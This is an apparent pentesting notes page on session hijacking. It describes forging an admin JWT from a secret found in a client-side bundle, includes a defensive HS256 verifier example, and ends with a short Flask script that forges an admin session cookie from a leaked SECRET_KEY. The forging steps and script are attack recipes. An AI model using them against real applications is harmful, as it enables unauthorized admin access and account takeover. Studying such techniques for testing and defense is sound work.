Session Hijacking
Client-Side JWT
Attack
If no cookies are set before registration or login, it is quite possible that the authorization process is being handled client-side.
Enumeration
Go to the browser's WebDev tools and look within the lib folder to find the file related to JWT; it is normally called jwt.js or jwt.ts.
Look for the JWT_SECRET and the signing methods. Use jwt.io or the JWT Editor extension from Burp Suite to craft a new token signed with the secret and give it the admin role.
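The reason a secret found in a client bundle is fatal is that an HS256 verifier cannot tell an issued token from one minted by anyone else holding the same secret; the signature check passes either way. The following added example (not code from the original page) is a minimal standard-library HS256 verifier that applies the checks a server should make (algorithm allowlist, constant-time signature comparison, expiry) and then shows which tokens it accepts and rejects. The secret, claims and timestamp are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Only the algorithm the server actually issues; "none" and any RS*/ES* swap are refused.
ALLOWED_ALGS = {"HS256"}


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(data: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a compact JWT: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes, now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if the token is well-formed, signed with `secret`, and unexpired; else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        payload = json.loads(b64url_decode(payload_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:  # wrong segment count, bad base64 (binascii.Error) or bad JSON
        return None
    if not isinstance(header, dict) or not isinstance(payload, dict):
        return None
    # Never trust the token's own "alg" beyond checking it is one we issue.
    if header.get("alg") not in ALLOWED_ALGS:
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):  # constant-time comparison
        return None
    exp = payload.get("exp")
    now = time.time() if now is None else now
    if not isinstance(exp, (int, float)) or exp <= now:
        return None
    return payload


def demo(now: float = 1_700_000_000) -> dict:
    """Constructed scenario: which tokens a correct verifier accepts."""
    server_secret = b"constructed-server-secret-keep-out-of-the-bundle"
    claims = {"sub": "alice", "role": "admin", "exp": now + 3600}
    issued = sign_hs256(claims, server_secret)
    # Same claims, signed with a different secret: rejected.
    wrong_key = sign_hs256(claims, b"some-other-secret")
    # "alg": "none" with an empty signature: rejected by the allowlist.
    none_hdr = b64url_encode(b'{"alg":"none","typ":"JWT"}')
    none_tok = f"{none_hdr}.{issued.split('.')[1]}."
    # Expired token: rejected even though the signature is valid.
    expired = sign_hs256({**claims, "exp": now - 1}, server_secret)
    return {
        "issued": verify_hs256(issued, server_secret, now) is not None,
        "wrong_key": verify_hs256(wrong_key, server_secret, now) is not None,
        "alg_none": verify_hs256(none_tok, server_secret, now) is not None,
        "expired": verify_hs256(expired, server_secret, now) is not None,
    }


if __name__ == "__main__":
    print(demo())
```

The "issued" case is the one this page is about: a token signed with the real secret passes every check, so once the secret ships to the browser the server has no way to distinguish a forged admin token from a legitimate one. The mitigation is on the issuing side: keep the signing secret in server configuration only, rotate it if it has ever been in a client build, and reject any algorithm other than the one you issue.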
Forge Flask Session Cookie
If you have obtained the SECRET_KEY and the session data, you may be able to forge a malicious cookie:
from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
# The application's leaked SECRET_KEY; Flask derives the cookie signing key from it
app.secret_key = '948bc3cddc2fc42fcc5bb230b17ae23f0181ee62d0502d9d069af9099406c5d9'

# Session data to embed in the forged cookie
session_data = {
    'user': 'admin',
    'role': 'administrator',
    'is_admin': True
}

# Serialize and sign the data with the same serializer Flask itself uses,
# which yields a valid value for the "session" cookie
session_interface = SecureCookieSessionInterface()
session_cookie = session_interface.get_signing_serializer(app).dumps(session_data)
print(session_cookie)